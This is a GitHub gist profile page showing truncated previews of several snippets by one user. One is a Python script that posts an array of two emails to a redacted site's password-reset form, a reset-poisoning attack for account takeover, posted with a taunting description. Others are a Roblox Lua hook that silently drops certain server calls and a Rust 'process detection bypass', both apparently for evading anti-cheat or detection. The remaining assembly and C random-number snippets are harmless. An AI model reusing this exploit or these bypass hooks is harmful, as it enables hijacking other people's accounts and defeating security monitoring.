Skip to content

Instantly share code, notes, and snippets.

View eeeeeeeeeevan's full-sized avatar

eeeeeeeeeevan

View GitHub Profile
@eeeeeeeeeevan
eeeeeeeeeevan / ebinvuln.py
Last active July 9, 2025 06:20
nice website buddy
import requests
TARGET = "https://?/forgot_password.php"
EMAIL1 = ""
EMAIL2 = ""
payload = {
'email[]': [EMAIL1, EMAIL2],
'submit': 'Reset Password'
}
local original
original = hookfunction(Instance.new("RemoteEvent").FireServer, newcclosure(function(self, ...)
local args = { ... }
for i, v in ipairs(args) do
if typeof(v) == "string" and string.sub(string.lower(v), 1, 2) == "x-" then
return task.wait(9e9)
end
end
return original(self, ...)
end)
@eeeeeeeeeevan
eeeeeeeeeevan / lcg.s
Created June 7, 2025 14:00
playing with MIPS asm - fuckass shitty lcg impl
main:
li $v0, 4
la $a0, prompt
syscall
li $v0, 5
syscall
move $t0, $v0
lw $t1, a
@eeeeeeeeeevan
eeeeeeeeeevan / pdbypass.rs
Created April 14, 2025 09:03
just a note for myself
unsafe fn process_detection_bypass(context: &mut CONTEXT, _symbol_name: &str, _offset: u64) {
if context.Rax != 0 && IsWindow(HWND(context.Rax as isize)).as_bool() {
let mut return_value = HWND(context.Rax as isize);
let cpid = GetCurrentProcessId();
let mut pid = 0;
GetWindowThreadProcessId(return_value, &mut pid);
if pid != cpid {
@eeeeeeeeeevan
eeeeeeeeeevan / hrng.c
Created March 10, 2025 06:11
for somethjibng
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <limits.h>
long hrng(long min, long max) {
int fd = open("/dev/urandom", O_RDONLY);
unsigned char randb;
if (read(fd, &randb, sizeof(randb)) != sizeof(randb)) {